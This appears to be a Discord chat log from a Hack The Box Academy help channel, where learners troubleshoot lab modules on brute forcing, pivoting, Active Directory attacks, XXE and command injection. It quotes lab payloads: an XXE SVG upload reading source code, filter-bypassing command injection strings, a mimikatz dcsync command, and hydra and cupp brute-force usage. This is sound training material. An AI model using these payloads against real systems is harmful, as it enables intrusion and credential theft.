The l337 fl4g 4 one is funny

:p gotta do it for the memes

but i really need to be careful when i make lists for this stuff

gotta remember that spaces actually matter... it fucked up the loop the first time

Anyway you can do it with curl/grep it just takes infinitely longer

Just tried impacket. Getting KeyError: 1 on line 315 in "./impacket/lib/python3.8/site-packages/impacket/krb5/ccache.py". Converted with ticketConverter.py, no issues there. I'll try with crackmapexec next. Need to download as I'm using ubuntu.

true true

just install netexec instead, same thing but better and updated

Hi its been a few days since I started bruteforcing ssh from the assessment in login brute forcing. I created a password wordlist with the employee name, and using a username generator I generated a user list. I then filtered the word list using the filters in the prevvious section. Please help

the brute force is just not working

my machines are just getting expired before the attack ends

Keep your lists simple, I made the mistake of adding way too much information for the custom wordlist making the wordlist ridiculously long

if you bruteforce the right username it won’t take more than 5 mins

I just put the user's full name in cupp and then started it along with leet, spl chars and random numbers

anything else should I try?

Try a list with just a first name first with special chars. etc. and then make it more complex if needed

is that the gates user?

no the wizard

the min requirements are 8 size, spl chars and numbers

okay try every username you’ve generated(cancel every 10 mins)

ok

and i suggest you use a wordlist with all filters applied

Yeah, a First name + spl chars, leet, and numbers will get you to minimum requirements

btw what is leet?

they never explained it

replacing a character with a similar character

e - 3, A - 4

Also I'm assuming you already have been doing this but in case you forgot, definitely trim your list after its generated using sed as explained in the module,

etc

hi 🙂 any XSS pro in here ?

https://dontasktoask.com

can´t get rid of this :

close the img tag before including the other stuff

https://academy.hackthebox.com/module/103/section/984

Yes I did use the sed filters

yes but maybe they want to ask secretly in dm to not disclose personal

Then this wouldn’t be the channel to ask

where

why not if its on a specific module

or if they want to adapt the question to whom is wilin to answer

Then it wouldn’t be personal

semi personal yes

thx i was so blind 🙂

asking to ask is actually pretty polite

Read the site

and ppl wont be mean to him after he asks soimething offtopic

:👍

no () around the falg

also you may also not wanna post the flag in the chat, spoilers for other people

the answers in academy are really really irritating!!

What does it mean when a port is open|filtered

It’s both open and filtered?

Im working on network enumeration with NMAP and im in the firewall and IDS/IPS Evasion - medium lab

It was my VPN that messed me up 😔

Nevermind 😃

Module: Advanced XSS and CSRF Exploitation
Section: XSS Filter Bypasses

Bypass xss filter but payload on exploitserver.htb doesn't sent info to exfiltrate server. Any hints?

Am i doing smth wrong? @fathom pendant ❤️

Hello Academy folks at HTB ! I am having issues connecting to the academy VPN servers. In the past weeks both have been working. In my network and workstation everything seems to work alright. I have IPv6 as well. The port 1334 appears to be filtered for me. Is there anyone who can confirm it's working in the past half an hour or so to see that it is not working only for me or it's a generic problem?

probably answer 1

I should have no? Do i have to reboot the network

maybe the user has no rdp access

oh i didnt ran the cmd as adm

you have a BH dump ?

you were right btw

i forgot to put the creds lmao

😉

AD Enumeration & Attacks - Skills Assessment Part I
Cant find any cleartext creds on MS01 with mimikatz running with elevated privileges and no hashes will crack, any tips are appreciated.

maybe use another approach ? 🙂

OK, I managed to complete the module I wanted for today, using the in-browser terminal, so never mind. However, I could not figure out why I was blocked from both VPNs. I will try later this week, I am off to bed now..😴

EU or US ?

EU

had the same yesterday

should I be able to see UDP 1337 as an open port via nmap?

i use eu udp today

With nmap the port is 'open|filtered' being UDP but I still can't connect. OK no problem, I will try later this week..

where did you nmap too ?

Pivoting module? A-->B-->C read the section carefully

as you said i should connect to the C network from te B

To edge-eu-academy-1.hackthebox.eu and edge-eu-academy-2.hackthebox.eu , port 1337 UDP

its not the case bc the host is down

A is foothold, B is second machine C is final

If you do ipconfig does that system have a 172.16.6.x interface?

Oh i see

no it doesnt

Then that's why you can't reach the final point

There's a middle host that needs to be pivoted into, as I said: read the section

so the B target is 172.16.5.19

y you are right

sry

I tend to be, especially if I had some troubles with it at first

Or if I've given the same answer a million times

yes 😉

dont hate me

im not digging the search feature on academy... does anyone remember the module where it teaches you how rewrite the hash.. i think thats what your doing. basically hiding the hash from detection of AV and it gives the example of virus total.

https://tenor.com/view/ateam-plan-together-i-love-it-when-hannibal-gif-19272497

found it! encoders - using the metasploit framework

how do I open .docx parrot os

office libre

or google docs

Do you have to sign into google docs?

yep

@next bronze Keep getting this "KeyError: 1" with impacket. crackmap and netexec give "Error occurs while reading from remote 104". Gotta do some serious digging here. Scratching my head on this one. I appreciate the help thus far.

I'm in the using web proxies module skill assessment and cannot get the lucky.php question to work. I am sending the request, editing the repsonse with "enabled" and then sending the edited repsonse to repeater, but it keeps repeating the unedited response.

As indicated, just gotta get lucky

Luck is not the issue, for some reason burp is not sending the edited request to repeater, so I'm just repeating the unedited.

So from what I understand looking at the modules a bit more is that sending and edited response to repeater is only just sending the original request?!

I'm just manually brute forcing it at this point then

Okay, so it looks like manually forwarding and then editing after each click did it. I feel like repeater should work for this. Anyone have success with a workaround or is my method the only way.

I keep sending a modified response to repeater, but it doesn't change

Still has "disabled"

Better screenshot

How do I get repeater to repeat the response?

When I send the edited response to repeater it only sends the request.

Are the certs not working?

?

"Not working" is so vague

Can you elaborate what you're asking

"STATE\ WAIT"

That's not "certs" that's the vpn

Try changing regions and downloading a new one

Also it's better to do this from the command line

Do you have a tun0 interface?

The problem is the cert not the interface

doesn't metter if is on windows or parrot OS

.

Download new vpn and try that

It looks like yours got goofed up

trynna get the rev shell on the remote/reverse port forwarding section

but there no rdp creds

just wanted to try the method shown in session

nvm

Just going to leave this here for future people who search this channel for the "Introduction to NoSql Injection Skills Assessment II." Ping me, I can provide sensible guidance. (Not answers!)

I've never seen that error from impacket, I assume you've restarted the target?

the tunneling,pivoting module is so fun lmao

Wordpress xmlrpc.php

curl -v -X POST -d "<?xml version='1.0'?><methodCall><methodName>pingback.ping</methodName><params><param><value><string>http://yourblog.com/post-that-links-to-target</string></value></param><param><value><string>http://blog.inlanefreight.com/target-post</string></value></param></params></methodCall>" http://blog.inlanefreight.com/xmlrpc.php
I am trying to get a pingback to work through this curl command. Can you please help me make it work. I also tried using the below script:

<methodCall>
<methodName>pingback.ping</methodName>
<params>
 <param>
  <value>
   <string>http://source/url/here</string>
  </value>
 </param>
 <param>
  <value>
   <string>http://target/url/here</string>
  </value>
 </param>
</params>
</methodCall>```
Any help would be appreciated

i am on pivoting, tunneling and port forwarding on the skill assessment and i am rdp'd into the first internal host. How can I transfer a file from the windows to my kali machine? Or to establish a remote connection between the two? I can't copy and paste between each other and when I try pinging the kali machine it says Destination unreachable. I also want to use https://github.com/Xre0uS/MultiDump?tab=readme-ov-file but not sure how to upload that to the windows host since no internet and apps.

Download to your system, copy to target

Tried that won't let me paste into rdp session

paste is blanked out

I mean copy as in: download

Aka transfer

how do i do that

Well, there's a whole module regarding ways to file transfer

Most rdp tools have a way for you to mount a drive

ok ill try

Xfreerdp has the /drive: option, and +clipboard

Ah cool didn't know about the +clipboard thanks

holy fudge that worked thanks

Hello! May I occupy your several minutes time? I have problem when RDP to target with user "htb-student" and password "Academy_student_AD!" . Is this credentias wrong?

Try wrapping the password in single quotes

Hello MarcieLee! Thanks for reply. I try but still wrong. I'm doing ACTIVE DIRECTORY ENUMERATION & ATTACKS -- ACL Enumeration

The error looks also to be kerberos error related

https://academy.hackthebox.com/module/77/section/859I am struggling with this module today. I have run nmap on the Ip and know that port 22 and 80 are open. I found the admin login page and was able to login. I have looked around there and didn't see anything on first inspection that I knew how to manipulate. I tried to ssh into the admin user with the same password but it failed. Not sure where I should start or go next

I also ran searchsploit with the apache server and ssh versions but didn't find any results

I've had little to no issues using rdp through xfreerdp or remmina

Admin login can verify the version of plug-ins to search for exploits

thanks, let me go back and re check that

there are two plugins with very generic names and their versions

when I run searchsploit against them it finds nothing

I think I found it

I also try xfreerdp and remmnia, both have a black screen.

Press enter

IT's working! both xfreerdp and remmnia. Thank you so much MarcieLee!

when i run my msf expoit it fails due to authentication error, but I know the username and paswd are correct, target uri is just the /admin.php

I really thought I had it lol

I have found what I think is a shell script that somehow has my kali machines IP in it

Well if it failed then that's likely the case

Also: your lhost was probably not set right btw

Your lhost needs to be the tun0 [htb vpn] ip

it is

Also, in most cases, you shouldn't need to mess with targeturi

thanky ou

finally found the user.txt flag. now to escalate privilige

Find out what the user can [su]do

Gtfobins is a handy resource as well

the msf exploit i ran keeps failing on the target now, waiting for the time on the target to expire in a minute to retry

Well aren't you already user?

Why are you trying to run another exploit?

in extrasid attack we are using a fake user with sid of enterprise domain admin group of the root domain set and acting like an admin right? kind of like having an fake backstage badge along with the VIP pass for a concert and gaining backstage access? is that correct

did anyone had problem access the splunk service in attacking common applications module?

Try the URL provided in the section + it takes time to load

After finishing the injection-attacks skill assessment, I have some questions on why certain things didn't work. Is anyone available that finished the assessment?

Sure thing, you can DM

on Attacking Common Applications > Attacking Applications Connecting to Services I get the following error when I try to run the break point. Any ideas what I've done wrong?

make sure the memory address is correct

Not correct one?

it can change on different machines because of ASLR, load it into gdb, break at start, then disas main to find the right address

must be doing something wrong, keep comming up with same address

nvm got it to work

Stuxbot uploaded and executed mimikatz. Provide the process arguments (what is after .\mimikatz.exe, ...) as your answer.

whats the formula

i found this but it says wrong
||.\mimikatz.exe, lsadump::dcsync /domain:eagle.local /all /csv, exit||

Wow lol that server side attacks skills assessment was stupid af

nvr i found the formula thanks

are you doing CBBH ?

Yup

Just the path though, want to have that as a base before I move on to cwee

web monkey

why not take the cbbh exam

I mean fuck the web , but probably I will do some bb

why taking the exam ?

Why would I

for the lols

Not worth it for me

Guys need a bit of clarification from this Javascript snippet from File Upload Attacks - Client Side Validation:

function checkFile(File) { ...SNIP... if (extension !== 'jpg' && extension !== 'jpeg' && extension !== 'png') { $('#error_message').text("Only images are allowed!"); File.form.reset(); $("#submit").attr("disabled", true); ...SNIP... } }

this is checking the file extension to match image format but shouldn't it be **OR **instead of AND as in:
if (extension !== 'jpg' || extension !== 'jpeg' || extension !== 'png') { or is this a java thing that I didnt understand

if it's not png and not jpeg and not jpg then it's not image

but will it work with an OR function?

if you use OR then you need to change the logic of all the function

like if it is jpg or it is jpeg or it is png then it's image else not image

ok makes sense ... guess i was looking at the snippet in a weird way. But thanks for the clarification

Hi someone can give me some advice on the skill assessment of 'HTTP ATTACKS" module ? I got it working I think but i can't get the mail thx

Hi in section RDP and SOCKS Tunneling with SocksOverRDP I RDP it First -> RDP to Second -> RDP to third and got the flag but didnt use SocksOverRdp , didnt understood what happened here ( Though I established double pivot using ligolo)

But cant ping third host that is 172.16.6.155 from my host host victor@DC01 is 172.16.5.*

added ip route for both

you need t start the second session

Solved

DId this
started new session on new interface*

Could you explain why we needed to use SocksOverRDP ? If it was simple using RDP repeatedly?

Idr what was in this section , but you are using ligolo anyway

Yes that worked.

Its easy than the other tools.

it's just a tool to enable a socks tunnel over rdp, for stealth and another thing in your toolkit ig

maybe I should learn how to use C2 , so get things more easier

you could yeah, but for pivoting ligolo is quite close to cobalt strike's pivot listener function

cobalt is too expensive , maybe I'll take a look at havoc

yeah nobody buys CS out of their own wallet

ig CRTO give you access to CS in their labs not sure

it does

I am interested, are you planning to make Red Teamer certification or path in the future of Academy?

me?

No, I am for somebody from HTB staff, just don't know how to address them all

the answer will be keep an eye on the academy platform lol

Ahah guess you're right

this bloodhound make hacking AD 10 times more easier

Hello I would like to use this

Can you help me plz

finally it isokay but I don't find a flag

FILE UPLOAD ATTACKS - Skills Assessment - File Upload Attacks

I'm trying to execute XXE to read the source code but to no avail. anyone can help me? I'm stuck for three days now. thank you so much

Hi guys, Im trying to create a program or plug in which would remove ads from a website and then change the source code of the website locally to show my ads instead over wifianyone here have any knowledge of how i could do this? Its my final year project to showcase the vulnerability of public wifi through on the go malvertising

is this correct? or not..

------WebKitFormBoundaryZ6FSmDnp32CClrLM
Content-Disposition: form-data; name="uploadFile"; filename="hello.svg"
Content-Type: image/svg+xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=upload.php"> ]>
<svg>&xxe;</svg>

https://academy.hackthebox.com/module/109/section/1037
im stuck of the OS command injection module
the hint says to use the injection character you identified earlier with the PATH variable
here is my injection:

ip=127.0.0.1%0a${PATH}

it passes the filters but no output 😦

help porfavor🥺

run, echo ${PATH}, what do you see? pick the character that you want to use like the example and use that in your injection command

read the section again to understand how it works

read #welcome , get verified and ask in #programming. but shouldn't be too hard, it's just adblock but instead of removing ads you're replacing it. ublock is open source, you can read that to understand how it works

zoom out first. write it out as it is. how will you access the path, and what is the path.

will do sir thanks

maybe someone can help mine 😦

i gave up on the skill assessment need to try it again

from what i remmber it does involve an xxe with svg or something like that

file Upload ? leeme check

im still stuck on this ffs 😦

read the section a couple more times and i still dont get it

the %0a is passing the filters but nothing gets executed

you need a command line 🙂 like cd, ls, something

i'm done!! figured it out. haha thanks

you have to return "ls /home"

ip=127.0.0.1%0als${IFS}${PATH:0:1}home
i tried that and still nothing

nice , I am sorry , I am working on other lab

it's okay! 🙂 thank you!

that should work

well it does'nt 😦

that commands right so it must be something else

do i restart the vm?

where are you sending it

with burp

are you sure you can read home from the directory your injecting into?

i tried your path and it worked

maybe restart the vm

will do ty

got it thanks

hello

gm fam

anyone is interested in making money with a bot?

This channel isn't for prolabs my guy

my bad.

No, read #rules and #welcome

#prolabs-dante but you'll have to pass the reading comprehension test that is #welcome

🧐

The bot thing

1. sounds sketchy at best
2. seems like promotion
3. wouldn't even belong in this channel

Sorry. my bad

u should be a moderator tbh

hello

i m new here

can i ask how get i start

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

I have a question about the footprinting module. module/112/section/1061 . When using curl i see on hack the box, they come back with way more domains than me i post a picture and show. mine only shows 2 where as theirs with the same command shows 22. Also when i use dig any . Nothing comes back.

any help? is this normal

Send por favor

Painful exercise

nevermind on my message I solved my problem. I was using ad-blocker dns settings. simply removed it temporarily now returns big lists

alright

cbbh is full of this kind of labs , just to let you know

actually i do still have a qusetion. going thru the module it says too type this : for i in $(cat subdomainlist);do host $i | grep "has address" | grep inlanefreight.com | cut -d" " -f1,4;done

If i do that it pops back an error saying cat: subdomainlist: No such file or directory

you need to create the subdomainlist first

just a a txt or list file

Didn’t have too much issues with it yet and I’m around 80%

at this point you suppose to have a list of subdomains on this file

wooow that was fast

Not that fast, I already did like 56% with cpts lol

I dont think this exercise has you go against inlanefreight.com

But it's been a minute

I forgot that lol

it says to curl -s https://crt.sh/\?q\=inlanefreight.com\&output\=json | jq . Then curl -s https://crt.sh/\?q\=inlanefreight.com\&output\=json | jq . | grep name | cut -d":" -f2 | grep -v "CN=" | cut -d'"' -f2 | awk '{gsub(/\n/,"\n");}1;' | sort -u Then for i in $(cat subdomainlist);do host $i | grep "has address" | grep inlanefreight.com | cut -d" " -f1,4;done So where is the domanlist file supposed to come from im follwing straight donw the screen

Ohhh yeah crt.sh occasionally breaks

Also I'm assuming you're saving the filtered crt.sh output to a file

on the password attack module under linux credential hunting i run the command "hydra -l kira -P mut_password.list ftp://10.129.21.32/" and i still get no results am i missing something here ?

Patience : the password should be in the mutated file: it might help to increase the threads

Hi

hey ganesh

I am in love with ligolo damn what a tool

hahahaha not when a listeber fail and endless trash pops up in the terminal

I guess I am enjoying doing skill assessment of Pivoting, because I succeeded in doing file transfer (was pain point for me)

I purchased gold monthluy plan just now because it said gold membership gets access to all tier3 modules, but i see i cannot access any tier3 modules, I want a immediate refund and cancellation please.

The naming isnt the best, gold annual is tier 3, gold monthly gives you cubes every month

If you wish for a refund, you'll need to reach out to support who can provide this for you

Hey I am working on the ACL Enumeration section for the Active Directory module and stuck on
the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word)

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

What is the phone number or chat for support?

See the link above please 🙂

Theres a chat system on the site, or customerops@hackthebox.com

thanks

what does +CPE credit submission do?